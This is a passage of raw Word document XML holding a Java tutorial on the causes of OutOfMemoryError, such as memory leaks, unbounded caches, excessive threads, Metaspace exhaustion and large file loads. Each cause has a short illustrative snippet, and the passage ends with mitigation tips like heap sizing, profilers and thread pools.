      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Keeping references to objects that are no longer needed, preventing them from being garbage collected, which results in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9F2E6" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B180418"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emoryLeak {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636202CE"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String&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42127CDE"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A4D16EE"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addData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7590D6"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B423C8E"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add("Some long data...");  // Continuously adding data without clearing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719F31E"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990B683"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FB6C004"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0F14007" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you are continuously adding data to a collection (like an ArrayList), and never clearing it, you will eventually run out of memory, leading to an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52324002" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008A683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4815A8A">
          <v:rect id="_x0000_i1664" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCE630B" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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Improper Use of Caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA806D" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Storing too many objects in memory for quick access (e.g., caching), but never releasing unused or expired objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DDB0EF" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9AAC5"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CacheExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6979419F"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lt;Integer, String&gt; cache = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD76CEA"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27A4C63"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cacheData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D143B6"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i = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1F7D7A"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D7B6D"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ache.put(i++, "Data " + i);  // Adding unlimited data without any expiration policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414D0BA"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D983807"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3AA30D1"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31FBEAF" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When there's no expiration or eviction policy for cached objects, your memory usage keeps increasing, leading to an eventual OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E3039C" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008A683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17B2597">
          <v:rect id="_x0000_i1665" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E4ECF" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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Too Many Threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF264EA" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creating a large number of threads in an application without considering the JVM's stack size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40165FD1" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3566A3AD"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ThreadCreation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA1FA04"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0A0140F3"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25676B"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new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD561A"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Empty thread, doing nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD0261"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art();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B12266"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A8170C2"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2CF83D1"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E00AB63" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each thread consumes memory, and if you try to spawn too many threads, you could exceed the JVM's </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack space</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, causing an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBD33A" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008A683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4C5DFA4E">
          <v:rect id="_x0000_i1666" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A31EE0" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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Metaspace Out of Memory (Java 8+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E46A2A" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Running out of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metaspace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory, which is where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., method definitions, class structures) is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C9B197" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAEA9A6"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Repeatedly loading classes dynamically in a loop without unloading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF1D32"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int i = 0; i &lt; 100000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFE379"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lass.forName("com.somepackage.SomeClass");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C690C4"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9AC9A20" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If too many classes are loaded into memory without being unloaded, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metaspace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can run out of space, causing an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA19F2E" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008A683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C58641E">
          <v:rect id="_x0000_i1667" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C649495" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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Large File Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4EF1E" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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cenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Trying to load a very large file into memory in one go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47764DAE" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EE8C0"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FileLoader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583CDBE"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throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78AA25"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byte[] data = Files.readAllBytes(Paths.get("largefile.txt"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C242927"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24BA399" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">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ACFE3AC" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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planation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This can cause an OutOfMemoryError if the file is too large to fit in the heap space allocated to the JVM. Using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BufferedReader</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Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to process large files in chunks would avoid this issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E1514" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008A683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605AE4F">
          <v:rect id="_x0000_i1668" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B60B4" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">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Mitigating OutOfMemoryError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499BB52" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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crease Heap Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can increase the maximum heap size using the -Xmx JVM argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B42223" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>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 -Xmx2g YourApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E818A" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Profilers and Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VisualVM</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JProfiler</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MAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help identify memory leaks or excessive memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C6965" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ptimize Data Structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Choose memory-efficient data structures (e.g., LinkedList vs. ArrayList, or WeakHashMap for caching).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E340E7F" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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anage Threads Properly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) instead of spawning new threads directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D10EE" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Garbage Collection Tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tune garbage collection policies if you have very specific memory requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F386E" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008A683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FCFD9E">
          <v:rect id="_x0000_i1669" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C48FC1" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A6836">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nclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBB702" w14:textId="77777777" w:rsidR="00F51127" w:rsidRPr="00CE4B95" w:rsidRDefault="00F51127" w:rsidP="008A683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utOfMemoryError is often the result of improper memory management, such as large object creation, memory leaks, or unoptimized caching strategies. It's crucial to monitor your application's memory consumption and implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for managing resources efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3E156" w14:textId="3E5DAFE6" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="0E787643">
          <v:rect id="_x0000_i1670" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE33F2" w14:textId="0018136C" w:rsidR="00DD2727" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD2727" w:rsidP="00495831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
